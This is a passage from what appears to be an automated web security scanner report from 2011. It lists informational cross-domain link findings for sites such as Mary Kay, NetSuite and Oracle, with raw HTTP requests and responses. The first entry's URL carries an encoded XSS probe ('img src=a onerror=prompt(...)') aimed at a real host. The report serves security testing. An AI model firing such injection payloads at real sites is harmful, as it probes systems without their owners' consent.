Path:   /hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf?search=xss HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __utma=7854507.756042197.1315345754.1315345754.1315345754.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345754.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:29 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5175
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

19.104. http://www.marykay.com/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /default.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /default.aspx?pid=mk HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Subsidiary=US; TLTHID=DFDB2FDD45BA94FC283A74BD7C3CBF64; TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 06 Sep 2011 16:45:46 GMT
Content-Type: text/html; charset=utf-8
Content-Language: en
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: Subsidiary=US; path=/
Set-Cookie: PreviousMoniker=; path=/
Set-Cookie: Moniker=; path=/
Set-Cookie: ConsultantContactID=-9223372036854775808; path=/
Set-Cookie: TLTHID=A79DE10345855E54FDA05590CB54614B; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Vary: Accept-Encoding
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/
Content-Length: 36830


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 TRANSITIONAL//EN" >
<html>
<head><meta name="title" content="Mary Kay... Find your way to beautiful!" /><link id="Link1" rel="image_src" href="http://w
...[SNIP]...
<li class="ANM-Leaf"><A class="ANM-Link" target="_blank" href="http://www.marykayfoundation.org">The Mary Kay Foundation</A>
...[SNIP]...
<td style="background:#e4e3df; vertical-align:middle; text-align:center"><a href="http://www.microsoft.com/windows/Internet-explorer/default.aspx"><img src="/images/ielogo.jpg" alt="Download internet explorer 8 now" />
...[SNIP]...
<td style="background:#e4e3df; vertical-align:middle; text-align:center"><a href="http://www.mozilla.com/en-US/firefox/ie.html"><img src="/images/fflogo.jpg" alt="Download firefox now" />
...[SNIP]...
<td><a href="http://www.youtube.com/marykay" target="_blank"><img src="/images/icn_yt.jpg" />
...[SNIP]...
<td><a href="http://www.facebook.com/MaryKay" target="_blank"><img src="/images/icn_fb.jpg" />
...[SNIP]...
<li><a href='http://applications.marykayintouch.com/' class="footer">
           INTOUCH</a>
...[SNIP]...
<li class="Leaf"><A class="Link" target="_blank" href="http://www.marykayfoundation.org">The Mary Kay Foundation</A>
...[SNIP]...

19.105. http://www.netsuite.com/portal/seo-landing-page/ecommerce/ecommerce-2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netsuite.com
Path:   /portal/seo-landing-page/ecommerce/ecommerce-2.html

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /portal/seo-landing-page/ecommerce/ecommerce-2.html?gclid=CMyov8D4iKsCFSBCgwodRnXLzA HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=QT3hTm8p7D1Q2hhMSM3rQLFQvcw2J3TQShKJRpn1Yhv9FTy2DQVng1H0TCB1KJGCkCkpDxH4DCFJNC0Nj2667xXJTjLwhfB8YwwBpTkcx5GNPSrJxnLxrTJMV2nLTVxD!-982923961; NLShopperId=Mhd7aqh5AbdCXidV; NLVisitorId=Mhd7aqh5AbpCXgSl; NS_VER=2011.2.0

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 4120
Content-Disposition: inline;filename="ecommerce-2.html"
NS_RTIMER_COMPOSITE: 234023608:73686F702D6A6176613030312E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=F
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:32:27 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...
<!--PDC Tag-->
<iframe src='http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719' scrolling='no' width='1' height='1' marginheight='0' marginwidth='0' frameborder='0'></iframe>
...[SNIP]...

19.106. http://www.oracle.com/openworld/register/packages/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /openworld/register/packages/index.html

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /openworld/register/packages/index.html?src=7013425&Act=226 HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/pls/www/go.lp?kw=&Src=7013425&Act=226&pcode=WWMK10042957MPP055&refer=http%3A//www.oracle.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1315342445639; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Findex.html; s_sq=oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahpf4%25253Aregister%252520now%252520for%252520oracle%252520openworld%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=299;ecid=35672222811585456,0:1)
Content-Length: 49483
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:54:07 GMT
Connection: close

<!DOCTYPE html>

<html id="top">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undefined";
var g_HttpRelativeWebRoot =
...[SNIP]...
</script>
<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<li><a href="https://oracleus.wingateweb.com/scheduler/exhibitorCatalog.do" target="_blank">Exhibitor Listing</a>
...[SNIP]...
<li><a href="https://oracleus.wingateweb.com/scheduler/exhibitorCatalog.do" target="_blank">Exhibitor Listing</a>
...[SNIP]...
<li><a href="http://twitter.com/oracleopenworld" title="Click to share this post on Twitter" target="_blank" class="u04twitterlink">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/OracleOpenWorld" target="_blank" class="u04facebooklink">Facebook</a>
...[SNIP]...
<li><a href="http://www.linkedin.com/groups?about=&gid=114605" target="_blank" class="u04linkedinlink">LinkedIn</a>
...[SNIP]...
<li><a href="https://oracleus.wingateweb.com/scheduler/eventcatalog/eventCatalog.do" target="_blank" class="u04tool7">Content Catalog</a>
...[SNIP]...
<li><a href="https://oracleus.wingateweb.com/scheduler/login.jsp" class="u04tool8" target="_blank">Schedule Builder</a>
...[SNIP]...
<li><a href="https://oracleus.wingateweb.com/portal/login.ww" target="_blank" class="u04tool6">My Account</a>
...[SNIP]...
<div class="w02w9"><a href="https://oracleus.wingateweb.com/portal/newreg.ww?brand=jone&amp;eve=ow&amp;wt=ow" target="_blank" title="register" onClick="var s=s_gi('oracleglobal,oraclecom,oracleopenworld'); s.linkTrackVars='eVar14,events'; s.linkTrackEvents='event7'; s.eVar14='OOW: RegPage: Register'; s.events='event7'; s.tl(this,'o','');" class="graphicbutton">Register<span>
...[SNIP]...
<div class="w02w9"><a href="https://oracleus.wingateweb.com/portal/newreg.ww?brand=jone&amp;eve=ow&amp;wt=ow" target="_blank" title="register" onClick="var s=s_gi('oracleglobal,oraclecom,oracleopenworld'); s.linkTrackVars='eVar14,events'; s.linkTrackEvents='event7'; s.eVar14='OOW: RegPage: Register'; s.events='event7'; s.tl(this,'o','');" class="graphicbutton">Register<span>
...[SNIP]...
<div class="w02w9"><a href="https://oracleus.wingateweb.com/portal/newreg.ww?brand=jone&eve=ow&wt=oub" target="_blank" title="register" onClick="var s=s_gi('oracleglobal,oraclecom,oracleopenworld'); s.linkTrackVars='eVar14,events'; s.linkTrackEvents='event7'; s.eVar14='OOW: RegPage: Register'; s.events='event7'; s.tl(this,'o','');" class="graphicbutton">Register<span>
...[SNIP]...
<div class="w02w9"><a href="https://oracleus.wingateweb.com/portal/newreg.ww?brand=comb&eve=dis&wt=di" target="_blank" title="register" onClick="var s=s_gi('oracleglobal,oraclecom,oracleopenworld'); s.linkTrackVars='eVar14,events'; s.linkTrackEvents='event22'; s.eVar14='OOW: RegPage: Discover Register'; s.events='event22'; s.tl(this,'o','');" class="graphicbutton">Register<span>
...[SNIP]...
<div class="w02w9"><a href="https://oracleus.wingateweb.com/portal/newreg.ww?brand=comb&eve=dis&wt=di" target="_blank" title="register" onClick="var s=s_gi('oracleglobal,oraclecom,oracleopenworld'); s.linkTrackVars='eVar14,events'; s.linkTrackEvents='event22'; s.eVar14='OOW: RegPage: Discover Register'; s.events='event22'; s.tl(this,'o','');" class="graphicbutton">Register<span>
...[SNIP]...
<div class="w03icon"><img src="http://www.oracleimg.com/us/assets/w03-deloitte-logo.gif" width="52" height="30" border="0" alt="Deloitte Sponsor" /></div>
...[SNIP]...
<p><a href="http://www.deloitte.com/" target="_blank"><em>
...[SNIP]...
<div class="w03icon"><img src="http://www.oracleimg.com/us/assets/w03-cisco-logo.gif" width="52" height="47" border="0" alt="Cisco Sponsor" /></div>
...[SNIP]...
<p><a href="http://www.cisco.com/" target="_blank"><em>
...[SNIP]...
<div class="w03icon"><img src="http://www.oracleimg.com/us/assets/w03-dell-logo.gif" width="52" height="62" border="0" alt="Dell Sponsor" /></div>
...[SNIP]...
<p><a href="http://www.dell.com/oracle" target="_blank"><em>
...[SNIP]...
<div class="w03icon"><img src="http://www.oracleimg.com/us/assets/w03-emc2-logo.gif" width="52" height="38" border="0" alt="EMC Sponsor" /></div>
...[SNIP]...
<p><a href="http://www.emc.com/" target="_blank"><em>
...[SNIP]...
<div class="w03icon"><img src="http://www.oracleimg.com/us/assets/w03-infosys-logo.gif" width="52" height="35" border="0" alt="InfoSys Sponsor" /></div>
...[SNIP]...
<p><a href="http://www.infosys.com/oracle/pages/index.aspx" target="_blank"><em>
...[SNIP]...
<div class="w03icon"><img src="http://www.oracleimg.com/us/assets/w03-intel-logo.gif" width="52" height="40" border="0" alt="Intel Sponsor" /></div>
...[SNIP]...
<div class="w03icon"><img src="http://www.oracleimg.com/us/assets/w03-csc-logo.gif" width="52" height="46" border="0" alt="CSC Sponsor" /></div>
...[SNIP]...
<p><a href="http://www.csc.com/" target="_blank"><em>
...[SNIP]...
<div class="w03icon"><img src="http://www.oracleimg.com/us/assets/w03-netapp-logo.gif" width="52" height="70" border="0" alt="NetApp Sponsor" /></div>
...[SNIP]...
<div class="w03z2"> <img src="http://www.oracleimg.com/us/assets/sponsortabclosed.png" /> </div>
...[SNIP]...
<span class="rightarrow"><img src="http://www.oracleimg.com/us/assets/rightarrow-066625.gif" /></span>
...[SNIP]...
<span class="rightarrow"><img src="http://www.oracleimg.com/us/assets/rightarrow-066625.gif" /></span>
...[SNIP]...
</ul>
<a href="https://oracleus.wingateweb.com/portal/newreg.ww?brand=jone&amp;eve=ow&amp;wt=ow" target="_blank" title="register" onclick="var s=s_gi('oracleglobal,oraclecom,oracleopenworld'); s.linkTrackVars='eVar14,events'; s.linkTrackEvents='event7'; s.eVar14='OOW: RegPage: Register'; s.events='event7'; s.tl(this,'o','');" class="l1">Register Now</a>
...[SNIP]...
</p> <a class="graphicbutton" href="https://oracleus.wingateweb.com/portal/newreg.ww?brand=jone&amp;eve=ow&amp;wt=ow" target="_blank" title="register" onclick="var s=s_gi('oracleglobal,oraclecom,oracleopenworld'); s.linkTrackVars='eVar14,events'; s.linkTrackEvents='event7'; s.eVar14='OOW: RegPage: Register'; s.events='event7'; s.tl(this,'o','');">Register<span>
...[SNIP]...
</p> <a class="graphicbutton" onClick="var s=s_gi('oracleglobal,oraclecom,oracleopenworld'); s.linkTrackVars='eVar14,events'; s.linkTrackEvents='event7'; s.eVar14='OOW: RegPage: Register'; s.events='event7'; s.tl(this,'o','');" title="register" target="_blank" href="https://oracleus.wingateweb.com/portal/newreg.ww?brand=jone&amp;eve=ow&amp;wt=ow">Register<span>
...[SNIP]...
</p> <a class="graphicbutton" onClick="var s=s_gi('oracleglobal,oraclecom,oracleopenworld'); s.linkTrackVars='eVar14,events'; s.linkTrackEvents='event7'; s.eVar14='OOW: RegPage: Register'; s.events='event7'; s.tl(this,'o','');" title="register" target="_blank" href="https://oracleus.wingateweb.com/portal/newreg.ww?brand=jone&amp;eve=ow&amp;wt=oub">Register<span>
...[SNIP]...
</p> <a class="graphicbutton" onClick="var s=s_gi('oracleglobal,oraclecom,oracleopenworld'); s.linkTrackVars='eVar14,events'; s.linkTrackEvents='event22'; s.eVar14='OOW: RegPage: Discover Register'; s.events='event22'; s.tl(this,'o','');" title="register" target="_blank" href="https://oracleus.wingateweb.com/portal/newreg.ww?brand=comb&amp;eve=dis&amp;wt=di">Register<span>
...[SNIP]...
</p> <a class="graphicbutton" onClick="var s=s_gi('oracleglobal,oraclecom,oracleopenworld'); s.linkTrackVars='eVar14,events'; s.linkTrackEvents='event22'; s.eVar14='OOW: RegPage: Discover Register'; s.events='event22'; s.tl(this,'o','');" title="register" target="_blank" href="https://oracleus.wingateweb.com/portal/newreg.ww?brand=comb&amp;eve=dis&amp;wt=di">Register<span>
...[SNIP]...
<div class="s05"><a href="http://www.deloitte.com/" target="_blank"><img height="64" width="278" border="0" alt="Deloitte, Marquee Sponsor" src="/us/assets/s05-sponsorimage.jpg" />
...[SNIP]...
<div class="s04w6"><a target="_blank" href="http://www.stepaheadsolution.com/index.php?option=com_content&amp;view=article&amp;id=49&amp;Itemid=56"><img height="34" width="162" border="0" alt="STEP AHEAD Business Intelligence Solutions" src="/us/assets/s04-partnerspotlight.jpg" />
...[SNIP]...
<div class="s04w6"><a target="_blank" href="http://www.chain-sys.com/"><img height="34" width="162" border="0" alt="CHAIN-SYS Data Mgmt - the easy way for Oracle EBS/JDE and SAP" src="/ocom/groups/public/@ocom/documents/digitalasset/367627.gif" />
...[SNIP]...
<div class="s04w6"><a target="_blank" href="http://www.excel4apps.com/?source=openworld2011"><img height="47" width="143" border="0" alt="excel4apps Excel solutions for Oracle and SAP" src="/ocom/groups/public/@ocom/documents/digitalasset/367630.gif" />
...[SNIP]...
<div class="s04w6"><a target="_blank" href="http://www.appscompanion.com"><img height="53" width="179" border="0" alt="AppsCompanion" src="/ocom/groups/public/@ocom/documents/digitalasset/402599.gif" />
...[SNIP]...
<p>Nowent's AppsCompanion provides automation for Oracle 11i/R12 users. Generate conversion programs. Upload setups and transactions from Excel. Even generate setup documents. <a target="_blank" href="http://www.appscompanion.com">Download Free Trial</a>
...[SNIP]...
<div class="s04w6"><a target="_blank" href="http://www.dnb.com/360"><img height="64" width="118" border="0" alt="D&amp;B" src="/ocom/groups/public/@ocom/documents/digitalasset/459699.gif" />
...[SNIP]...
<li><a href="https://oracleus.wingateweb.com/scheduler/eventcatalog/eventCatalog.do" target="_blank">Content Catalog</a>
...[SNIP]...
<li><a href="https://oracleus.wingateweb.com/portal/login.ww" target="_blank">My Account</a>
...[SNIP]...
<li><a href="https://oracleus.wingateweb.com/scheduler/login.jsp" target="_blank">Schedule Builder</a>
...[SNIP]...
<li><a href="http://twitter.com/oracleopenworld" target="_blank" class="u05twitterlink">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/OracleOpenWorld" target="_blank" class="u05facebooklink">Facebook</a>
...[SNIP]...
<li><a href="http://www.linkedin.com/groups?about=&gid=114605" target="_blank" class="u05linkedinlink">LinkedIn</a>
...[SNIP]...
<!-- Activenetwork SiteCatalyst calls -->
<script type="text/javascript" src="https://oracleus.wingateweb.com/portal/analytics/s_code.js"></script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_openworld2011.js"></script>
...[SNIP]...

19.107. http://www.oracle.com/technetwork/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/index.html

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /technetwork/index.html?ssSourceSiteId=ocomen HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343562818; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Findex.html%23; s_sq=oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41152695571452255,0:1)
Vary: Accept-Encoding
Content-Length: 200478
Date: Tue, 06 Sep 2011 16:12:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<a href='http://www.oracle.com/' onclick="navTrack('otn','en','header','logo');"><img src='http://www.oracleimg.com/us/assets/oralogo-small.gif' border='0' /></a>
...[SNIP]...
<a class="legalese" onmouseover="mvqMOv('panelDivOTN','img1');" onmouseout="mvqMOu('panelDivOTN');" href="#">United States<img style="MARGIN-LEFT: 4px;" id="img1" border="0" alt="Change Country, Oracle Worldwide Web Sites" src="http://www.oracleimg.com/us/assets/dropdown-arrow-new.gif" /></a>
...[SNIP]...
/index.html?ssSourceSiteId=otnen' class='legalese' onMouseOver="mvqMOv('panelDiv_comm','img2');" onMouseOut="mvqMOu('panelDiv_comm');" onclick="navTrack('otn','en','header','communities');">Communities<img src='http://www.oracleimg.com/us/assets/dropdown-arrow-new.gif' style='margin-left: 4px;' border='0' id='img2'></a>
...[SNIP]...
<a href='#' class='legalese' onMouseOver="mvqMOv('panelDiv_iam','img3');" onMouseOut="mvqMOu('panelDiv_iam');">I am a...<img src='http://www.oracleimg.com/us/assets/dropdown-arrow-new.gif' style='margin-left: 4px;' border='0' id='img3'></a>
...[SNIP]...
<div ><a href='http://oraclecfo.com' class='sngPst' onclick="navTrack('otn','en','header','chieffinancialofficer(cfo)');">Chief Financial Officer (CFO)</a>
...[SNIP]...
<a href='#' class='legalese' onMouseOver="mvqMOv('panelDiv_iwanto','img4');" onMouseOut="mvqMOu('panelDiv_iwanto');">I want to...<img src='http://www.oracleimg.com/us/assets/dropdown-arrow-new.gif' style='margin-left: 4px;' border='0' id='img4'></a>
...[SNIP]...
<a onclick='navTrack("ocom","en","hnav","productsandservices:spotlight:exalogic promo");' href='http://www.oracle.com/us/products/middleware/exalogic/index.html?ssSourceSiteId=otnen'><img src='http://www.oracleimg.com/us/assets/exalogic-promo.jpg' width='166' height='87' border='0' alt='Marvel' style='*padding-bottom:10px;padding-top:10px;'></a>
...[SNIP]...
<dd><a href="http://www.mysql.com/downloads/" onclick="navTrack('otn','en','hnav','downloads:database:mysqldownloads');">MySQL</a>
...[SNIP]...
<dd><a href="http://netbeans.org/downloads/index.html" onclick="navTrack('otn','en','hnav','downloads:developertools:netbeansidedownloads');">NetBeans IDE</a>
...[SNIP]...
<dd><a href='http://java.sun.com/javase/downloads/index.jsp' onclick='navTrack("ocom","en","hnav","downloads:populardownloads:javafordevelopersdownloads");'>Java for Developers</a>
...[SNIP]...
<dd><a href='http://java.com/download' onclick='navTrack("ocom","en","hnav","downloads:populardownloads:javaforyourcomputerdownloads");'>Java for Your Computer</a>
...[SNIP]...
<dd><a href='http://www.mysql.com/downloads/' onclick='navTrack("ocom","en","hnav","downloads:populardownloads:mysqldownloads");'>MySQL</a>
...[SNIP]...
<a onclick='navTrack("ocom","en","hnav","about:spotlight:engineered_promo");' href='http://www.oracle.com/us/corporate/features/engineered-173370.html?ssSourceSiteId=otnen'><img src='http://www.oracleimg.com/us/assets/engineered-promo.gif' width='166' height='87' border='0' alt='FPO'></a>
...[SNIP]...
<a onclick='navTrack("ocom","en","hnav","about:spotlight:OOWBanner");' href='http://www.oracle.com/go/?&Src=7013425&Act=236&pcode=WWMK10042957MPP055'><img src='http://www.oracleimg.com/us/11057362-oow-spotlight-397037.jpg' width='166' height='94' border='0' alt='OOW'></a>
...[SNIP]...
<li><a target="" onClick="navTrack('otn','en','hpelinks','javanet')" href="http://java.net/">Java.net<br />
...[SNIP]...
<li><a onClick="navTrack('otn','en','hpdl','mysql');" href="http://mysql.com/downloads">MySQL</a>
...[SNIP]...
<li><a onClick="navTrack('otn','en','hpdl','mysql');" href="http://netbeans.org/index.html">NetBeans IDE</a>
...[SNIP]...
<h3 class="post-title"><a onClick="navTrack('otn','en','hpnews','otnvdd');" href="https://oracle.6connex.com/portal/database/login">Virtual Developer Day: Hands-on Database Application Development (Sept. 13)</a>
...[SNIP]...
<a onclick="navTrack('otn','en','footer','Hardware and Software Engineered to Work Together');" href='/us/corporate/index.html'><img src='http://www.oracleimg.com/us/assets/oracle-footer-tagline.gif' border='0' alt='Hardware and Software Engineered to Work Together'/></a>
...[SNIP]...
<a href='/us/syndication/feeds/index.html' onclick="navTrack('otn','en','footer','rss');"> <img src='http://www.oracleimg.com/us/assets/feed-icon-14x14.png' alt='Oracle RSS Feeds' style='margin-bottom: 1px;' align='absmiddle' border='0' height='14' width='14'></a>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

19.108. http://www.oracle.com/us/ciocentral/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/ciocentral/index.html

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /us/ciocentral/index.html?origref=http://www.oracle.com/index.html HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/us/cio/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gpv_p24=no%20value; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_nr=1315343430587; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Findex.html; s_sq=oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.oracle.com%25252Findex.html%252523%2526ot%253DA

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35988164901865103,0:1)
Content-Length: 15880
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:10:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta content="text/html;
...[SNIP]...
<a href="javascript:document.searchForm.submit()" onclick="javascript: return isNotNull(document.searchForm.q.value)"><img src="http://www.oracleimg.com/us/ciocentral/search-right-420491.gif "></a>
...[SNIP]...
<span id="prev"><img src="http://www.oracleimg.com/ocom/groups/public/@ocom/documents/digitalasset/357455.png" alt="Previous" style="border-width: 0px;" /></span>
...[SNIP]...
<span id="next"><img src="http://www.oracleimg.com/ocom/groups/public/@ocom/documents/digitalasset/357495.png" alt="Next" style="border-width: 0px;" /></span>
...[SNIP]...
<div class="OEitem"><a href="http://www.oraclesurveys.com/se.ashx?s=251137450DEC3B1A"><img src="http://www.oracleimg.com/us/ciocentral/oraclecio-hp-1-454562.jpg" alt="CIO Survey Banner" /></a>
...[SNIP]...
<a href="/us/ciocentral/res-videos-404509.html#cisco"><img src="http://www.oracleimg.com/us/ciocentral/oraclecio-hp-2-454563.jpg" alt="Cisco Systems" /></a>
...[SNIP]...
<a href="/us/ciocentral/news-359472.html"><img src="http://www.oracleimg.com/us/ciocentral/oraclecio-hp-3-454564.jpg" alt="info matters exalogic" /></a>
...[SNIP]...
<div id="footer">
   <img class="floatleft" src="http://www.oracleimg.com/ocom/groups/public/@ocom/documents/digitalasset/357512.gif" alt="Software. Hardware. Complete." style="border-width:0px;" />
   <p>
...[SNIP]...
<a class="legalese" href="http://www.oracle.com/us/syndication/feeds/index.html" target="_blank"><img class="rssIcon" src="http://www.oracleimg.com/us/assets/feed-icon-14x14.png" alt="Oracle RSS Feeds" style="border-width:0px;" /></a>
...[SNIP]...
<!-- Start SiteCatalyst code -->
   <script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code_ocom.js"></script>    
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

19.109. http://www.oracle.com/us/go/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/go/index.html

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /us/go/index.html?Src=7013425&Act=226&pcode=WWMK10042957MPP055 HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
